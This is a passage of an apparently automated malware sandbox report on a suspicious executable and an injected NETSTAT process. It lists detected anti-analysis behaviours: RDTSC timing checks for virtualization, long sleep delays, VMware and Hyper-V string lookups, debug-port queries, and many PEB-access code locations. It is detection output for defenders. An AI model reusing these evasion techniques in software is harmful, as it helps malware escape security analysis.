          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | RDTSC instruction interceptor: First address: 00000000009585E4 second address: 00000000009585EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | RDTSC instruction interceptor: First address: 000000000095896E second address: 0000000000958974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe TID: 6944 | Thread sleep time: -59255s >= -30000s
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe TID: 6972 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6020 | Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Last function: Thread delayed
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Thread delayed: delay time: 59255
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Thread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000005.00000000.715711377.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.720870223.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.748781487.0000000006650000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: NQBNpLezqZKv1P4.exe | Binary or memory string: DdUXhZQ[fUE6Ws]YTSk6WLInYD73f[o5QsEYYq{nV]8XY[8XVpEzfoQZd5M[]WMZ][<IgogJD}4pfy]3[3Y5]DL[]}Y4[3Y5]D75esU[\moJezE[TiU[]qET]m8Z\3QqeMU[]K<IgogJD|YJg4E[eyQ3[3Y5]DL6e3Q5\xDjfoUZd5<pfTU6\osp\SQ[]mopg|Y5XlY5Y843[wEjfoUZd5<pfTU6\osp\SQ[e|<pU843[wEjfoQ[YDL[]nopgyMKX3QZ
          Source: explorer.exe, 00000005.00000000.720870223.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.721395078.000000000A715000.00000004.00000001.sdmp | Binary or memory string: War&Prod_VMware_SATAa
          Source: explorer.exe, 00000005.00000000.725971847.000000000FD86000.00000004.00000001.sdmp | Binary or memory string: E#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}TT
          Source: explorer.exe, 00000005.00000000.745709839.0000000004710000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000005.00000000.715711377.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.721395078.000000000A715000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000005.00000000.715711377.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.721588911.000000000A784000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000005.00000000.715711377.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process queried: DebugPort
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4_2_00409B10 LdrLoadDll,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0343DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0344EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03508B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03508F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03463B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03463B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0350070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0350070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03434F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03434F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034737F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03441B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03441B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034ED380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03448794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03462397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03464BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03464BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03464BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03505BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03439240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03439240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03439240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03439240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03447E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03447E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03447E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03447E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03447E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03447E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034C4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03508A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0347927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03468E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03448A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03453A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03474A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03474A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034EFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03478EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03508ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034636CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03462ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034EFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03462AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034616E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034476E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034CFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03500EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03500EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03500EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03473D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03457D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03439100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03439100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03439100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03508D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03454120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03454120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03454120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03454120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03454120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034BA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03464D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03464D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03464D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034C41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034E8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03462581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03462581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03462581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03462581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03432D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03432D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03432D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03432D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03432D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03462990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034635A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03461DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03461DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03461DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03450050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03450050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03501074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B6C0A mov eax, dword ptr fs:[00000030h]
